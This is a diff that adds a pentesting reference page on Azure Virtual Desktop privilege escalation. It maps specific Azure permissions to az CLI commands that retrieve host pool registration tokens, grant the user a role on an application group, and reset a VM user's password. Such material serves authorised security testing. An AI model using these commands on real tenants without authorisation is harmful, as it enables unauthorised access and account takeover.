vitualdesktop

src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-desktop-privesc.md

@@ -0,0 +1,38 @@
+# Az - Virtual Desktop Privesx
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Azure Virtual Desktop Privesc
+
+### `Microsoft.DesktopVirtualization/hostPools/retrieveRegistrationToken/action`
+You can retrieve the registration token used to register virtual machines within an host pool.
+
+```bash
+az desktopvirtualization hostpool retrieve-registration-token -n testhostpool -g Resource_Group_1
+```
+
+### ("Microsoft.Authorization/roleAssignments/read", "Microsoft.Authorization/roleAssignments/write") && ("Microsoft.Compute/virtualMachines/read","Microsoft.Compute/virtualMachines/write","Microsoft.Compute/virtualMachines/extensions/read","Microsoft.Compute/virtualMachines/extensions/write")
+
+With this permissions you can add a user assignment to the Application group, which is needed to access the virtual machine of the virtual desktop.
+```bash
+az rest --method PUT \
+  --uri "https://management.azure.com/subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP_NAME>/providers/Microsoft.DesktopVirtualization/applicationGroups/<APP_GROUP_NAME>/providers/Microsoft.Authorization/roleAssignments/<NEW_ROLE_ASSIGNMENT_GUID>?api-version=2022-04-01" \
+  --body '{
+    "properties": {
+      "roleDefinitionId": "/subscriptions/<SUBSCRIPTION_ID>/providers/Microsoft.Authorization/roleDefinitions/1d18fff3-a72a-46b5-b4a9-0b38a3cd7e63",
+      "principalId": "<USER_OBJECT_ID>"
+    }
+  }'
+```
+
+Additionally you can change the virtual machine user and password to access it
+```bash
+az vm user update \
+  --resource-group <RESOURCE_GROUP_NAME> \
+  --name <VM_NAME> \
+  --username <USERNAME> \
+  --password <NEW_PASSWORD>
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
+